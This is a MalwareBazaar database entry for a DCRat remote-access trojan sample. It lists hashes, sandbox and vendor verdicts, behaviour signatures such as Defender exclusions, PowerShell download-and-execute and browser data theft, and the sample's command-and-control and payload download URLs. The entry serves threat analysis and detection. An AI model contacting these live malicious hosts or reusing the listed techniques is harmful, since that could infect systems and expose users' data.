MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 786cd9f43e76702fd26319d85239b17c6acf79e5afda1a3ab82d95e46bbceff7. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


DCRat


Vendor detections: 10


Intelligence 10 IOCs 1 YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 786cd9f43e76702fd26319d85239b17c6acf79e5afda1a3ab82d95e46bbceff7
SHA3-384 hash: adeb357f119590bcef49c2733b6953ef92594e880f2e0f64039e03996926581c4c38c07e2666216dec4562097d835301
SHA1 hash: 2d41cae4788f5c860af7a039a084d4b960eca14c
MD5 hash: 560cd8701722062e9eca6e7bebfa4272
humanhash: cup-summer-juliet-comet
File name:786CD9F43E76702FD26319D85239B17C6ACF79E5AFDA1.exe
Download: download sample
Signature DCRat
Create hunting rule
File size:13'824 bytes
First seen:2021-11-10 01:00:59 UTC
Last seen:Never
File type:Executable exe
MIME type:application/x-dosexec
imphash a5f2aefc58375ca77caff4230aecbe91 (1 x DCRat)
ssdeep 192:v0M9ln+QAd+b9mVPUqPXcEVmFWD+w8qcv0uQ25TwGzBtgeEgr+kHaY:v0iln+nd+pSPc6n8qcvNzTTzBWYr3aY
TLSH T179523E552789BB05C03EDEF21313F5B866B62C351A939098B96D0F3D8D7AAE58F1430B
Reporter abuse_ch
Tags:DCRat exe


Avatar
abuse_ch
DCRat C2:
http://82.146.56.118/output/_cached/geobigload.php

Indicators Of Compromise (IOCs)

Below is a list of indicators of compromise (IOCs) associated with this malware samples.

IOCThreatFox Reference
http://82.146.56.118/output/_cached/geobigload.php https://threatfox.abuse.ch/ioc/246304/

Intelligence

File Origin
# of uploads :
1
# of downloads :
133
Origin country :
n/a
Vendor Threat Intelligence
Detection:
n/a
Link:
https://www.capesandbox.com/analysis/204576/
Detection(s):
SecuriteInfo.com.Variant.Razy.913779.5952.4146.UNOFFICIAL
Create hunting rule

Verdict:
No Threat
Threat level:
  2/10
Confidence:
100%
Link:
https://www.filescan.io/uploads/618b19d0dec3347825a0ced0/reports/4a08d8ec-3cbb-4f5a-9b86-f0a822c8f92f/overview
Result
Verdict:
MALICIOUS
Details
Windows PE Executable
Found a Windows Portable Executable (PE) binary. Depending on context, the presence of a binary is suspicious or malicious.
Malware family:
Generic Malware
Create hunting rule
Verdict:
Malicious
Link:
https://analyze.intezer.com/analyses/d9cdecda-98b1-4464-8b54-51a1628c826f
Result
Threat name:
BitCoin Miner DCRat
Create hunting rule
Detection:
malicious
Classification:
troj.evad.mine
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/886375
Signature
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Powershell drops PE file
Sigma detected: Powershell Defender Exclusion
Sigma detected: Powershell download and execute file
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Script Execution From Temp Folder
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses schtasks.exe or at.exe to add and modify task schedules
Wscript starts Powershell (via cmd or directly)
Yara detected BitCoin Miner
Yara detected DCRat
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 signatures2 2 Behavior Graph ID: 518848 Sample: 786CD9F43E76702FD26319D8523... Startdate: 10/11/2021 Architecture: WINDOWS Score: 100 153 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->153 155 Antivirus detection for dropped file 2->155 157 Antivirus / Scanner detection for submitted sample 2->157 159 11 other signatures 2->159 11 786CD9F43E76702FD26319D85239B17C6ACF79E5AFDA1.exe 2->11         started        14 services32.exe 2->14         started        16 powershell.exe 2->16         started        18 5 other processes 2->18 process3 signatures4 181 Adds a directory exclusion to Windows Defender 11->181 20 cmd.exe 1 11->20         started        183 Multi AV Scanner detection for dropped file 14->183 23 cmd.exe 14->23         started        25 cmd.exe 14->25         started        process5 signatures6 161 Suspicious powershell command line found 20->161 163 Wscript starts Powershell (via cmd or directly) 20->163 165 Tries to download and execute files (via powershell) 20->165 27 powershell.exe 20->27         started        29 powershell.exe 20->29         started        31 powershell.exe 20->31         started        42 6 other processes 20->42 167 Adds a directory exclusion to Windows Defender 23->167 33 powershell.exe 23->33         started        36 conhost.exe 23->36         started        46 2 other processes 23->46 38 conhost.exe 25->38         started        40 schtasks.exe 25->40         started        process7 dnsIp8 48 EO2.exe 27->48         started        52 EO3.exe 29->52         started        54 EO1.exe 31->54         started        127 192.168.2.1 unknown unknown 33->127 129 82.146.56.118, 49745, 49752, 49759 THEFIRST-ASRU Russian Federation 42->129 115 C:\Users\user\AppData\Local\TempO3.exe, PE32 42->115 dropped 117 C:\Users\user\AppData\Local\TempO2.exe, PE32+ 42->117 dropped 119 C:\Users\user\AppData\Local\TempO1.exe, PE32 42->119 dropped 185 Powershell drops PE file 42->185 file9 signatures10 process11 file12 107 C:\Windows\System32\services32.exe, PE32+ 48->107 dropped 109 C:\Windows\System32\...\sihost32.exe, PE32+ 48->109 dropped 145 Antivirus detection for dropped file 48->145 147 Multi AV Scanner detection for dropped file 48->147 149 Machine Learning detection for dropped file 48->149 151 2 other signatures 48->151 56 sihost32.exe 48->56         started        59 services32.exe 48->59         started        62 cmd.exe 48->62         started        64 cmd.exe 48->64         started        111 C:\...\savesHostNetwinPerfcommon.exe, PE32 52->111 dropped 113 C:\savesHostNet\noNjApR3JG8.bat, ASCII 52->113 dropped 66 wscript.exe 52->66         started        signatures13 process14 dnsIp15 173 Multi AV Scanner detection for dropped file 56->173 175 Adds a directory exclusion to Windows Defender 56->175 68 cmd.exe 56->68         started        131 github.com 140.82.121.4, 443, 49774 GITHUBUS United States 59->131 133 raw.githubusercontent.com 185.199.110.133, 443, 49775 FASTLYUS Netherlands 59->133 135 sanctam.net 59->135 71 cmd.exe 59->71         started        73 cmd.exe 59->73         started        177 Uses schtasks.exe or at.exe to add and modify task schedules 62->177 75 conhost.exe 62->75         started        77 powershell.exe 62->77         started        85 3 other processes 62->85 79 conhost.exe 64->79         started        81 schtasks.exe 64->81         started        179 Wscript starts Powershell (via cmd or directly) 66->179 83 cmd.exe 66->83         started        signatures16 process17 signatures18 169 Wscript starts Powershell (via cmd or directly) 68->169 171 Adds a directory exclusion to Windows Defender 68->171 87 conhost.exe 68->87         started        89 powershell.exe 68->89         started        101 3 other processes 68->101 91 conhost.exe 71->91         started        93 powershell.exe 71->93         started        103 3 other processes 71->103 105 2 other processes 73->105 95 savesHostNetwinPerfcommon.exe 83->95         started        99 conhost.exe 83->99         started        process19 file20 121 C:\Windows\SystemApps\...\SearchUI.exe, PE32 95->121 dropped 123 C:\Windows\System32\...\powershell.exe, PE32 95->123 dropped 125 C:\Program Files\...\kvrVvxXgHhhXykIpPMRj.exe, PE32 95->125 dropped 137 Multi AV Scanner detection for dropped file 95->137 139 Creates autostart registry keys with suspicious values (likely registry only malware) 95->139 141 Creates multiple autostart registry keys 95->141 143 2 other signatures 95->143 signatures21
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/786cd9f43e76702fd26319d85239b17c6acf79e5afda1a3ab82d95e46bbceff7/
Threat name:
Win32.Trojan.Tiny
Create hunting rule
Status:
Malicious
First seen:
2021-11-06 17:48:51 UTC
AV detection:
21 of 28 (75.00%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=pbwnt5b6ozyc7utddhmfeonrprvm66pfv7nbuovyfwk6i254573q._file
Verdict:
malicious
Result
Malware family:
dcrat
Create hunting rule
Score:
  10/10
Tags:
family:dcrat infostealer persistence rat spyware stealer suricata
Link:
https://tria.ge/reports/211110-bc8fjadbcn/
Behaviour
Creates scheduled task(s)
Modifies registry class
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Drops file in Program Files directory
Drops file in System32 directory
Adds Run key to start application
Loads dropped DLL
Reads user/profile data of web browsers
Blocklisted process makes network request
Downloads MZ/PE file
Executes dropped EXE
DCRat Payload
DcRat
Process spawned unexpected child process
suricata: ET MALWARE DCRAT Activity (GET)
Malware Config
Dropper Extraction:
http://82.146.56.118/output/_cached/EternalphpsecureProcessapi/b09851803105e3256d3d7ea4d4294cf1cdadcfaf.bin
http://82.146.56.118/output/_cached/EternalphpsecureProcessapi/60aafbb767c19b91d8dff49c5185de5ba687a116.bin
http://82.146.56.118/output/_cached/EternalphpsecureProcessapi/1574bddb75c78a6fd2251d61e2993b5146201319.bin
Unpacked files
SH256 hash:
786cd9f43e76702fd26319d85239b17c6acf79e5afda1a3ab82d95e46bbceff7
MD5 hash:
560cd8701722062e9eca6e7bebfa4272
SHA1 hash:
2d41cae4788f5c860af7a039a084d4b960eca14c
Link:
https://www.unpac.me/results/d8ed1b1c-b07c-4577-a91d-3619c61f82aa/
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/786cd9f43e76702fd26319d85239b17c6acf79e5afda1a3ab82d95e46bbceff7

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Cape
Cape
https://www.capesandbox.com/analysis/204576/

Comments